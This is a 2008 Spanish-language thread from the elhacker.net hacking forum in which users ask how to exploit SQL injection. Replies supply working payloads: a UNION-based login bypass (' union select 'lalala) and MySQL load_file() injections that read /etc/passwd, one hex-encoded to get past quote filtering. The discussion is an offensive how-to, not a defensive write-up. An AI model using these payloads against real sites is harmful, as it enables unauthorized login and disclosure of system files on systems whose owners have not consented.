SQL injection...

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Foro

Web

Blog

24 Abril 2024, 18:22 pm

Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

SQL injection...

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: SQL injection... (Leído 4,425 veces)

APOKLIPTICO

Desconectado

Mensajes: 3.871

Toys in the attic.

SQL injection...

« en: 1 Octubre 2008, 18:41 pm »

Hola gente, tengo una duda, que puedo explotar en la siguiente query:

Código

SELECT clave FROM users WHERE us='{X}'

Puedo inyectar en {X}, pero no acepta comandos concatenados (poner ";" y poner despues otro comando).

A alguien se le ocurre algo???


	En línea

AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.

s E t H

Desconectado

Mensajes: 152

Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.

Re: SQL injection...

« Respuesta #1 en: 1 Octubre 2008, 20:21 pm »

usandio union capaz?
http://sql.1keydata.com/es/sql-union.php


	En línea

escribiendo en 0V3RL04D 1N TH3 N3T y XD Blog!

Mi deviantart

APOKLIPTICO

Desconectado

Mensajes: 3.871

Toys in the attic.

Re: SQL injection...

« Respuesta #2 en: 1 Octubre 2008, 23:09 pm »

Pero no me va a devolver la tabla usando UNION, xq lo q hace es buscar el password en la tabla, lo almacena en una variable y despues lo compara con el q le pones como "password"...


	En línea

sirdarckcat

Aspirante a supervillano
Moderador

Desconectado

Mensajes: 7.029

No estoy loco, soy mentalmente divergente

Re: SQL injection...

« Respuesta #3 en: 2 Octubre 2008, 02:49 am »

usuario: ' union select 'lalala
password: lalala


	En línea

Leer reglas

- WarZone.elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net

APOKLIPTICO

Desconectado

Mensajes: 3.871

Toys in the attic.

Re: SQL injection...

« Respuesta #4 en: 2 Octubre 2008, 02:59 am »

Claro! como no lo habia pensado...
Graciass!!


	En línea

Eazy

Desconectado

Mensajes: 229

Eazy [FM-Team]

Re: SQL injection...

« Respuesta #5 en: 2 Octubre 2008, 22:32 pm »

Para no crear un nuevo tema, alguien sabe como usar la funcion Load_file en una inyeccion mysql?


	En línea

[/url]

Azielito

no es
Colaborador

Desconectado

Mensajes: 9.188

>.<

Re: SQL injection...

« Respuesta #6 en: 3 Octubre 2008, 00:54 am »

es con union select creo recordar

union select

Código

UNION SELECT 1,load_file(archivo),2,3...

foro.elhacker.net/bugs_y_exploits/dataextract_databaseuserversion_by_ozx-t229414.0.html


« Última modificación: 3 Octubre 2008, 00:56 am por Azielito »	En línea

pepeluxx

Desconectado

Mensajes: 347

Todos los días se aprende algo nuevo

Re: SQL injection...

« Respuesta #7 en: 5 Octubre 2008, 13:05 pm »

http://www.site.com/?id=-1 union select 1,load_file('/etc/passwd'),3,...

o si filtra las comillas, en HEX:

http://www.site.com/?id=-1 union select 1,load_file(0x2f6574632f706173737764),3,...


	En línea

Blog
Pepelux
Twitter
eNYe-Sec

Eazy

Desconectado

Mensajes: 229

Eazy [FM-Team]

Re: SQL injection...

« Respuesta #8 en: 6 Octubre 2008, 00:24 am »

Gracias gente


	En línea

[/url]

Páginas: [1]

Ir a: